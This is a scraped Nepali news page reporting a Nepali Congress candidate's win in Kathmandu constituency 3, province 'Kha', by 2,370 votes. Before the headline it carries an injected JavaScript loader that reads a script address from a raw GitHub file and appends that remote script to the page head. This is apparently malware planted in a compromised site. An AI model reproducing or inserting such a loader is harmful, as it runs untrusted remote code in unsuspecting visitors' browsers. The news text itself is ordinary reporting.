;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); काठमाडौं ३, प्रदेश ‘ख’ मा नेपाली कांग्रेसका बिमल ठकुरी विजयी – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • काठमाडौं ३, प्रदेश ‘ख’ मा नेपाली कांग्रेसका बिमल ठकुरी विजयी
Breaking News

काठमाडौं ३, प्रदेश ‘ख’ मा नेपाली कांग्रेसका बिमल ठकुरी विजयी

जुनेली न्यून, काठमाडौँ।

काठमाडौं क्षेत्र नं ३ प्रदेश (ख) मा कांग्रेसका उम्मेदवार विमल ठकुरी विजयी भएका छन्। उनले २३७० मतान्तरले आफ्ना प्रतिद्वन्द्वी रामेश्वर फुयाललाई पराजित गरेका हुन्।

सो क्षेत्रमा पर्ने प्रदेश ख मा कागेश्वरी मनोहरा नगरपालिका  वडा नं १,२ र ३ र गोकर्णेश्वर नगरपालिका वडा नं १,२,३,४,६,७ र ८ रहेको छ ।

ठकुरीले २०७४ सालको चुनावमा पनि टिकेट पाएका थिए तर झिनो मतले पराजित भएका थिए। यसपाली भने जनताले उनलाई रोजेर विजयी गराएका छन्।

अन्तिम नतिजा आउन बाँकी छ।

फेसबुक प्रतिक्रियाहरु